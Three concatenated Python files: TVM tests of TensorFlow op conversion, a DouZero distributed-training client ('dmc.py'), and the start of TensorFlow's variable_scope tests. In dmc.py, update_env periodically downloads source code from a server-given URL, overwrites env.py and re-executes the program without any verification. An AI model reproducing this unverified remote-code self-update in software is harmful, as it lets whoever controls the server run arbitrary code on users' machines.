np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
["StatefulPartitionedCall:0", z2.name],
mode="vm",
init_global_variables=True,
)
def _test_spop_placeholder_with_shape_and_default_value():
with tf.Graph().as_default():
data = np.ones([1], dtype=int).astype(np.int32)
dataVar = tf.Variable(data, shape=data.shape)
pl1 = array_ops.placeholder_with_default(dataVar, shape=data.shape, name="pl1")
tpl = tf.convert_to_tensor(pl1, dtype=tf.int32)
@function.Defun(*[tf.int32])
def pl_with_default(pl):
return tf.expand_dims(tf.multiply(pl, pl), 0)
z = gen_functional_ops.StatefulPartitionedCall(
args=[tpl], Tout=[tf.int32], f=pl_with_default
)
compare_tf_with_tvm(
data, ["pl1:0"], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_arange_feed():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), "t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, (3, 3, 3), "t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_placeholder_numpy_array_feed():
with tf.Graph().as_default():
t1_data = np.array([[-1, 1, 3], [2, -2, 4], [2, -3, 14]], dtype=np.int32)
t2_data = np.array([[-2, 1, 2], [12, -2, 14], [12, -3, 4]], dtype=np.int32)
t1 = tf.placeholder(tf.int32, name="t1")
t2 = tf.placeholder(tf.int32, name="t2")
@tf.function
def add(x, y):
return tf.add(x, y, "add_t1_t2")
t3 = add(t1, t2)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [t3.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_basic():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_nested():
with tf.Graph().as_default():
t1 = tf.placeholder(tf.int32, (3, 3, 3), name="t1")
t1_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
t2 = tf.placeholder(tf.int32, name="t2")
t2_data = np.arange(27, dtype=np.int32).reshape((3, 3, 3))
@tf.function
def myfunc(x, y):
return tf.add(x, y, "myfunc")
@tf.function
def myfunc2(x, y):
z = myfunc(x, y)
l = myfunc(z, y)
m = myfunc(l, z)
return tf.add(l, m, "myfunc2")
res1 = myfunc(t1, t2)
res2 = myfunc2(res1, t1)
compare_tf_with_tvm(
[t1_data, t2_data], ["t1:0", "t2:0"], [res2.name], mode="vm", init_global_variables=True
)
def _test_spop_function_invocation_no_autograph():
with tf.Graph().as_default():
@tf.function(autograph=False)
def fun1(a):
return tf.multiply(a, a)
@tf.function(autograph=False)
def fun2(b):
return tf.multiply(b, 10)
@tf.function
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
t3 = fun3(tf.constant(10.5), tf.constant(20.4))
compare_tf_with_tvm([], [], [t3.name], mode="vm", init_global_variables=True)
def _test_spop_function_invocation_defun():
with tf.Graph().as_default():
def fun1(a):
return tf.multiply(a, a)
def fun2(b):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
x = fun2(x)
y = fun1(y)
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)],
Tout=[dtypes.float32],
f=fun3,
name="SpopFnInvocation",
)
compare_tf_with_tvm([], [], "SpopFnInvocation:0", mode="vm", init_global_variables=True)
def _test_spop_arithmetic():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 3)
def arithmetic(m, x, c):
z = tf.add(tf.multiply(m, x), c)
return z
m = tf.constant(10)
x = tf.constant(20)
c = tf.constant(2)
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[m, x, c], Tout=[tf.int32], f=arithmetic
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_control_flow():
with tf.Graph().as_default():
@function.Defun(*[dtypes.float32] * 2)
def Body1(x, y):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:0"):
z = math_ops.multiply(x, y)
i = 0
while i < 10:
i += 1
if i == 5:
continue
z = math_ops.multiply(x, y * i)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[constant_op.constant(32.0), constant_op.constant(100.0)],
Tout=[dtypes.float32],
f=Body1,
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_variables():
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32)
var2 = tf.Variable(const2, dtype=tf.int32)
@function.Defun(tf.int32, tf.int32)
def Forward(x, y):
return tf.multiply(x, y)
z = gen_functional_ops.StatefulPartitionedCall(
args=[var1, var2], Tout=[tf.int32], f=Forward
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", init_global_variables=True, mode="vm"
)
def _test_spop_constants():
with tf.Graph().as_default():
@function.Defun(*[dtypes.int32] * 2)
def constantsFn(x, y):
vv = tf.constant([2, 3, 4], name="vv")
z = tf.add(vv + x, y)
return z
a = tf.constant(20000, name="a")
b = tf.constant(40000, name="b")
spopFn = gen_functional_ops.StatefulPartitionedCall(
args=[a, b], Tout=[tf.int32], f=constantsFn
)
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
def _test_spop_stateful():
# This test case is to test that TVM rejects any TF stateful operations
# (including Resource Variables) except StatefulPartitionedCall/PartitionedCall
# (as these two operators can still be used as container graphs to execute
# "stateless" operations internally.
tf.reset_default_graph()
with tf.Graph().as_default():
@tf.function
def FunctionWithStatefulOp_One(i):
b = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
y = tf.multiply(b, i)
return y
@tf.function
def FunctionWithStatefulOp(m, n):
a = tf.random.uniform(shape=[2, 4], maxval=10, dtype=tf.float32, seed=10)
x = tf.multiply(a, m)
y = FunctionWithStatefulOp_One(n)
z = tf.multiply(x, y)
return z
op = FunctionWithStatefulOp(constant_op.constant(1.0), constant_op.constant(2.0))
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm([], [], [op.name], init_global_variables=True, mode="vm")
assert execinfo.value.args[0].startswith("The following operators are not implemented")
def _test_spop_device_assignment():
# This test case is to test that TVM rejects inconsistent device assignment
# while using StatefulPartitionedCall/PartitionedCall operators which in case of TVM will
# be used as container graphs to internally execute "stateless" operations.
tf.reset_default_graph()
with tf.Graph().as_default():
def fun1(a):
with ops.device("/GPU:0"):
return tf.multiply(a, a)
def fun2(b):
with ops.device("/job:localhost/replica:0/task:0/device:CPU:1"):
return tf.multiply(b, b)
@function.Defun(dtypes.float32, dtypes.float32, func_name="Fun3")
def fun3(x, y):
with ops.device("/CPU:0"):
x = fun2(x)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:2"):
y = fun1(y)
with ops.device("/job:localhost/replica:0/task:0/device:CPU:3"):
z = tf.add(x, y)
return z
op = gen_functional_ops.StatefulPartitionedCall(
args=[tf.constant(10.5), tf.constant(20.4)], Tout=[dtypes.float32], f=fun3
)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Found inconsistent Device assignment")
def _test_spop_resource_variables():
# This test case is to test that TVM rejects any graph containing
# resource variables with StatefulPartitionedOp.
tf.reset_default_graph()
with tf.Graph().as_default():
const1 = tf.constant(10)
const2 = tf.constant(20)
var1 = tf.Variable(const1, dtype=tf.int32, use_resource=True)
var2 = tf.Variable(const2, dtype=tf.int32, use_resource=True)
@tf.function
def resourceVariablesTest(x, y):
return tf.multiply(x, y)
op = resourceVariablesTest(var1, var2)
with pytest.raises(Exception) as execinfo:
compare_tf_with_tvm(
[], [], "StatefulPartitionedCall:0", mode="vm", init_global_variables=True
)
assert execinfo.value.args[0].startswith("Graph is not frozen." " Provide a frozen graph")
def test_forward_spop():
_test_spop_stateful()
_test_spop_device_assignment()
_test_spop_resource_variables()
# Placeholder test cases
_test_spop_placeholder_without_shape_info()
_test_spop_placeholder_with_shape_and_default_value()
_test_spop_placeholder_numpy_arange_feed()
_test_spop_placeholder_numpy_array_feed()
# Function Invocation test cases
_test_spop_function_invocation_basic()
_test_spop_function_invocation_nested()
_test_spop_function_invocation_no_autograph()
_test_spop_function_invocation_defun()
# Test cases for various other TF constructs
_test_spop_arithmetic()
_test_spop_control_flow()
_test_spop_variables()
_test_spop_constants()
#######################################################################
# Dynamic input shape
# -------------------
def test_forward_dynamic_input_shape():
tf.reset_default_graph()
with tf.Graph().as_default():
data = tf.placeholder(tf.float32, name="data", shape=(None,))
out = data + 1
np_data = np.random.uniform(size=(2,)).astype("float32")
out_name = "add"
with tf.Session() as sess:
graph_def = tf_testing.AddShapesToGraphDef(sess, out_name)
tf_output = run_tf_graph(sess, np_data, "data:0", ["{}:0".format(out_name)])
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
np_data,
["data"],
1,
target=device,
layout="NCHW",
out_names=[out_name],
mode="vm",
ignore_in_shape=True,
)
tvm.testing.assert_allclose(tvm_output[0], tf_output[0], rtol=1e-5, atol=1e-5)
def test_forward_dynmaic_rnn_lstmblockcell():
if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
return
total_series_length = 50000
truncated_backprop_length = 15
state_size = 4
echo_step = 3
batch_size = 5
num_layers = 5
def generateData():
x = np.array(np.random.choice(2, total_series_length, p=[0.5, 0.5]))
y = np.roll(x, echo_step)
y[0:echo_step] = 0
x = x.reshape((batch_size, -1)) # The first index changing slowest, subseries as rows
y = y.reshape((batch_size, -1))
return (x, y)
batchX_placeholder = tf.placeholder(tf.float32, [batch_size, truncated_backprop_length])
init_state = tf.placeholder(tf.float32, [num_layers, 2, batch_size, state_size])
state_per_layer_list = tf.unstack(init_state, axis=0)
rnn_tuple_state = tuple(
[
tf.nn.rnn_cell.LSTMStateTuple(
state_per_layer_list[idx][0], state_per_layer_list[idx][1]
)
for idx in range(num_layers)
]
)
# Forward passes
def lstm_cell():
return tensorflow.contrib.rnn.LSTMBlockCell(state_size)
cell = tf.nn.rnn_cell.MultiRNNCell(
[lstm_cell() for _ in range(num_layers)], state_is_tuple=True
)
states_series, current_state = tf.nn.dynamic_rnn(
cell, tf.expand_dims(batchX_placeholder, -1), initial_state=rnn_tuple_state
)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
x, y = generateData()
_current_state = np.zeros((num_layers, 2, batch_size, state_size))
start_idx = 0
end_idx = start_idx + truncated_backprop_length
batchX = x[:, start_idx:end_idx]
# Save current state for TVM
current_state_tvm = _current_state
_current_state, _states_series = sess.run(
[current_state, states_series],
feed_dict={batchX_placeholder: batchX, init_state: _current_state},
)
# Organize results and corresponding names
tf_output = [_states_series]
for c in _current_state:
tf_output.append(c.c)
tf_output.append(c.h)
name = [states_series.name.split(":")[0]]
for t in current_state:
name.append(t.c.name.split(":")[0])
name.append(t.h.name.split(":")[0])
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(sess, graph_def, name)
tvm_output = run_tvm_graph(
final_graph_def,
[batchX.astype("float32"), current_state_tvm.astype("float32")],
["Placeholder", "Placeholder_1"],
out_names=name,
num_output=len(name),
mode="vm",
disabled_pass=["FoldScaleAxis"],
)
# Compare result
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
#######################################################################
# Unique
# ------------
def _test_unique(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique(in_data)
if is_dyn:
compare_tf_with_tvm(np_data, "in_data:0", ["Unique:0", "Unique:1"], mode="vm")
else:
compare_tf_with_tvm(None, "", ["Unique:0", "Unique:1"])
def test_forward_unique():
"""test Unique"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique(50, dtype, is_dyn)
_test_unique(100, dtype, is_dyn)
#######################################################################
# Unique with counts
# ------------
def _test_unique_with_counts(n, dtype, is_dyn):
tf.reset_default_graph()
np_data = np.random.randint(100, size=n).astype(dtype)
with tf.Graph().as_default():
if is_dyn:
in_data = tf.placeholder(dtype, [n], name="in_data")
else:
in_data = tf.constant(np_data, dtype, name="in_data")
tf.unique_with_counts(in_data)
if is_dyn:
compare_tf_with_tvm(
np_data,
"in_data:0",
["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"],
mode="vm",
)
else:
compare_tf_with_tvm(
None, "", ["UniqueWithCounts:0", "UniqueWithCounts:1", "UniqueWithCounts:2"]
)
def test_forward_unique_with_counts():
"""test UniqueWithCounts"""
for dtype in ["int32", "int64"]:
for is_dyn in [False, True]:
_test_unique_with_counts(10, dtype, is_dyn)
_test_unique_with_counts(20, dtype, is_dyn)
#######################################################################
# check graph ir for nn.moments
# ------------
def test_moments():
g = tf.Graph()
shape = [4, 176, 8, 8]
dtype = "float32"
with g.as_default():
A = tf.placeholder(shape=shape, dtype=dtype, name="A")
B = tf.placeholder(shape=shape, dtype=dtype, name="B")
mean, variance = tf.nn.moments(A, [1], keep_dims=True)
normalised_input = (A - mean) / tf.sqrt(variance + 0.0005)
mod, _ = from_tensorflow(g.as_graph_def(add_shapes=True))
program = """
def @main(%A: Tensor[(4, 176, 8, 8), float32]) {
%527 = mean(%A, axis=[1], keepdims=True) /* moments/mean */;
%528 = subtract(%A, %527) /* sub */;
%529 = subtract(%A, %527);
%530 = multiply(%529, %529) /* moments/SquaredDifference */;
%531 = mean(%530, axis=[1], keepdims=True) /* moments/variance */;
%532 = add(%531, 0.0005f) /* add */;
%533 = sqrt(%532) /* Sqrt */;
divide(%528, %533) /* truediv */
}
"""
mod_golden = tvm.parser.parse('#[version = "0.0.5"]\n' + program)
tvm.ir.assert_structural_equal(mod["main"].body, mod_golden["main"].body, map_free_vars=True)
if __name__ == "__main__":
pytest.main([__file__])
|
dmc.py
|
import os
import sys
import threading
import time
import timeit
import pprint
from collections import deque
import warnings
import torch
from torch import multiprocessing as mp
from torch import nn
import pickle
import random
from .file_writer import FileWriter
from .models import Model
from .utils import get_batch, log, create_env, create_optimizers, act
import client_helper
import bit_helper
import requests
from douzero.env.env import env_version
mean_episode_return_buf = {p: deque(maxlen=100) for p in ['landlord', 'landlord_up', 'landlord_down']}
model_version = 0
models = {}
warnings.filterwarnings("ignore", category=UserWarning)
def compute_loss(logits, targets):
loss = ((logits.squeeze(-1) - targets) ** 2).mean()
return loss
batches = []
program_version = "3.0.0"
updating = False
def learn(position, actor_models, model, batch, optimizer, flags, lock):
global model_version, models, batches
batches.append({
"position": position,
"batch": batch
})
return {
'mean_episode_return_' + position: 0,
'loss_' + position: 0,
}
def train(flags):
"""
This is the main funtion for training. It will first
initilize everything, such as buffers, optimizers, etc.
Then it will start subprocesses as actors. Then, it will call
learning function with multiple threads.
"""
global models
plogger = FileWriter(
xpid=flags.xpid,
xp_args=flags.__dict__,
rootdir=flags.savedir,
)
checkpointpath = os.path.expandvars(
os.path.expanduser('%s/%s/%s' % (flags.savedir, flags.xpid, 'model.tar')))
T = flags.unroll_length
B = flags.batch_size
print(flags.actor_device_cpu)
if flags.actor_device_cpu:
device_iterator = ['cpu']
else:
device_iterator = range(flags.num_actor_devices)
assert flags.num_actor_devices <= len(flags.gpu_devices.split(',')), 'The number of actor devices can not exceed the number of available devices'
def update_model(ver, urls, force):
global model_version, models, updating
if updating:
return
updating = True
if model_version != ver or force:
print("检测到模型更新")
if len(urls) > 0:
url = urls[random.randint(0, len(urls)-1)]
else:
print("模型更新失败:没有有效的模型地址")
updating = False
return
print("更新中,请耐心等待")
st = time.time()
weights = client_helper.download_pkl(url)
if weights is not None:
model_version = ver
for position in ["landlord", "landlord_up", "landlord_down", "bidding"]:
if flags.actor_device_cpu:
models["cpu"].get_model(position).load_state_dict(weights[position])
torch.save(weights[position], "./models/" + position + ".ckpt")
else:
for device in range(flags.num_actor_devices):
models[device].get_model(position).load_state_dict(weights[position])
torch.save(weights[position], "./models/" + position + ".ckpt")
with open("./model_version.txt", "w") as f:
f.write(str(model_version))
print("更新模型成功!耗时: %.1f s" % (time.time() - st))
else:
print("更新模型失败!")
updating = False
def load_actor_models():
global model_version, models
if os.path.exists("./model_version.txt"):
with open("./model_version.txt", "r") as f:
model_version = int(f.read())
print("初始化,正在获取服务器版本")
model_info = client_helper.get_model_info()
if model_info is not None:
print("版本获取完成,服务器版本:", model_info["version"])
update_model(model_info["version"], model_info["urls"], False)
else:
print("服务器版本获取失败,更新模型失败")
return
if not (os.path.exists("./models/landlord.ckpt") and os.path.exists(
"./models/landlord_up.ckpt") and os.path.exists("./models/landlord_down.ckpt") and os.path.exists("./models/bidding.ckpt")):
update_model(model_info["version"], model_info["urls"], True)
# def check_update_model(force=False):
# global model_version, models
# if os.path.exists("./model_version.txt"):
# with open("./model_version.txt", "r") as f:
# model_version = int(f.read())
# print("版本比对中")
# model_info = client_helper.get_model_info()
# if model_info is not None:
# if model_info["program_version"] != program_version:
# print("客户端版本不正确!请从Github重新拉取!")
# return
# print("服务器版本:", model_info["version"])
# update_model(model_info["version"], model_info["urls"], force)
# else:
# print("版本比对失败,更新模型失败")
# if not (os.path.exists("./models/landlord.ckpt") and os.path.exists(
# "./models/landlord_up.ckpt") and os.path.exists("./models/landlord_down.ckpt")):
# update_model(model_info["version"], model_info["urls"], True)
# Initialize actor models
global models
models = {}
for device in device_iterator:
model = Model(device="cpu")
model.eval()
models[device] = model
# Initialize queues
actor_processes = []
ctx = mp.get_context('spawn')
batch_queues = {"landlord": ctx.SimpleQueue(), "landlord_up": ctx.SimpleQueue(), "landlord_down": ctx.SimpleQueue(), "bidding": ctx.SimpleQueue()}
# Learner model for training
learner_model = Model(device=flags.training_device)
# Create optimizers
optimizers = create_optimizers(flags, learner_model)
# Stat Keys
stat_keys = [
'mean_episode_return_landlord',
'loss_landlord',
'mean_episode_return_landlord_up',
'loss_landlord_up',
'mean_episode_return_landlord_down',
'loss_landlord_down',
'mean_episode_return_bidding',
'loss_bidding',
]
frames, stats = 0, {k: 0 for k in stat_keys}
position_frames = {'landlord': 0, 'landlord_up': 0, 'landlord_down': 0, 'bidding': 0}
global model_version
# Load models if any
if flags.load_model:
print("加载模型中,请稍后")
load_actor_models()
for position in ["landlord", "landlord_up", "landlord_down", 'bidding']:
if flags.actor_device_cpu:
models["cpu"].get_model(position).load_state_dict(torch.load("./models/" + position + ".ckpt", map_location="cpu"))
else:
for device in device_iterator:
models[device].get_model(position).load_state_dict(torch.load("./models/" + position + ".ckpt", map_location="cuda:"+str(device)))
# Starting actor processes
if flags.actor_device_cpu:
flags.num_actor_devices = 1
for device in device_iterator:
num_actors = flags.num_actors
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(i, device, batch_queues, models[device], flags))
actor.start()
actor_processes.append(actor)
def upload_batch_loop(flags):
global model_version, models
while True:
if len(batches) > 0:
my_batches = []
my_batches.extend(batches)
batches.clear()
ver, urls = client_helper.handle_batches(my_batches, model_version, program_version)
st = time.time()
if len(urls) > 0:
if ver != model_version:
print("新模型:", ver)
update_model(ver, urls, True)
print("更新完成!耗时: %.1f s" % (time.time() - st))
else:
print("没有收到模型下载地址")
else:
print("没有新Batch")
time.sleep(15)
def update_env(env_ver, url, force=False):
if env_ver != env_version or force:
try:
req = requests.get(url)
data = req.content
if len(data) > 10000:
with open("douzero/env/env.py", "wb") as f:
f.write(data)
print("更新Env文件,重启客户端")
os.execl(sys.executable, sys.executable, *sys.argv)
time.sleep(1)
exit()
else:
print("更新Env文件时出错: ", data)
except Exception as e:
print("更新Env文件时出错: ", repr(e))
def check_model_update_loop():
while True:
try:
info = client_helper.get_model_info()
if info is not None:
if "program_version" in info:
if info["program_version"] != program_version:
print("客户端版本过时,请从Github重新拉取")
# ver, urls = info["version"], info["urls"]
# update_model(ver, urls, False)
env_ver = info["env_version"]
update_env(env_ver, info["env_url"])
except Exception as e:
print("在检查模型更新时出现错误: ", repr(e))
time.sleep(300)
def batch_and_learn(i, device, position, local_lock, position_lock, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal frames, position_frames, stats
while frames < flags.total_frames:
batch = get_batch(batch_queues, position, flags, local_lock)
_stats = learn(position, models, learner_model.get_model(position), batch,
optimizers[position], flags, position_lock)
with lock:
for k in _stats:
stats[k] = _stats[k]
to_log = dict(frames=frames)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
frames += T * B
position_frames[position] += T * B
thread_upload = threading.Thread(target=upload_batch_loop, args=(flags,))
thread_upload.setDaemon(True)
thread_upload.start()
thread_update_model = threading.Thread(target=check_model_update_loop)
thread_update_model.setDaemon(True)
thread_update_model.start()
threads = []
locks = {}
for device in device_iterator:
locks[device] = {'landlord': threading.Lock(), 'landlord_up': threading.Lock(), 'landlord_down': threading.Lock(), 'bidding': threading.Lock()}
position_locks = {'landlord': threading.Lock(), 'landlord_up': threading.Lock(), 'landlord_down': threading.Lock(), 'bidding': threading.Lock()}
for device in device_iterator:
for i in range(flags.num_threads):
for position in ['landlord', 'landlord_up', 'landlord_down', 'bidding']:
thread = threading.Thread(
target=batch_and_learn, name='batch-and-learn-%d' % i, args=(i,device,position,locks[device][position],position_locks[position]))
thread.start()
threads.append(thread)
def checkpoint(frames):
if flags.disable_checkpoint:
return
# log.info('Saving checkpoint to %s', checkpointpath)
# _models = learner_model.get_models()
# torch.save({
# 'model_state_dict': {k: _models[k].state_dict() for k in _models},
# 'optimizer_state_dict': {k: optimizers[k].state_dict() for k in optimizers},
# "stats": stats,
# 'flags': vars(flags),
# 'frames': frames,
# 'position_frames': position_frames
# }, checkpointpath)
# Save the weights for evaluation purpose
# for position in ['landlord', 'landlord_up', 'landlord_down']:
# model_weights_dir = os.path.expandvars(os.path.expanduser(
# '%s/%s/%s' % (flags.savedir, flags.xpid, position + '_weights_' + str(frames) + '.ckpt')))
# torch.save(learner_model.get_model(position).state_dict(), model_weights_dir)
fps_log = []
timer = timeit.default_timer
try:
last_checkpoint_time = timer() - flags.save_interval * 60
while frames < flags.total_frames:
start_frames = frames
position_start_frames = {k: position_frames[k] for k in position_frames}
start_time = timer()
time.sleep(10)
if timer() - last_checkpoint_time > flags.save_interval * 60:
checkpoint(frames)
last_checkpoint_time = timer()
end_time = timer()
fps = (frames - start_frames) / (end_time - start_time)
fps_avg = 0
fps_log.append(fps)
if len(fps_log) > 30:
fps_log = fps_log[1:]
for fps_record in fps_log:
fps_avg += fps_record
fps_avg = fps_avg / len(fps_log)
position_fps = {k: (position_frames[k] - position_start_frames[k]) / (end_time - start_time) for k in
position_frames}
log.info("本机速度 %.1f fps", fps_avg)
if fps_avg == 0:
print("本机速度在训练的前几分钟为0是正常现象,请稍后")
# log.info('After %i (L:%i U:%i D:%i) frames: @ %.1f fps (avg@ %.1f fps) (L:%.1f U:%.1f D:%.1f) Stats:\n%s',
# frames,
# position_frames['landlord'],
# position_frames['landlord_up'],
# position_frames['landlord_down'],
# fps,
# fps_avg,
# position_fps['landlord'],
# position_fps['landlord_up'],
# position_fps['landlord_down'],
# pprint.pformat(stats))
except KeyboardInterrupt:
return
else:
for thread in threads:
thread.join()
log.info('Learning finished after %d frames.', frames)
checkpoint(frames)
plogger.close()
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Expected tf.group() expected Tensor arguments not 'None' with
# type '<type 'NoneType'>'
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
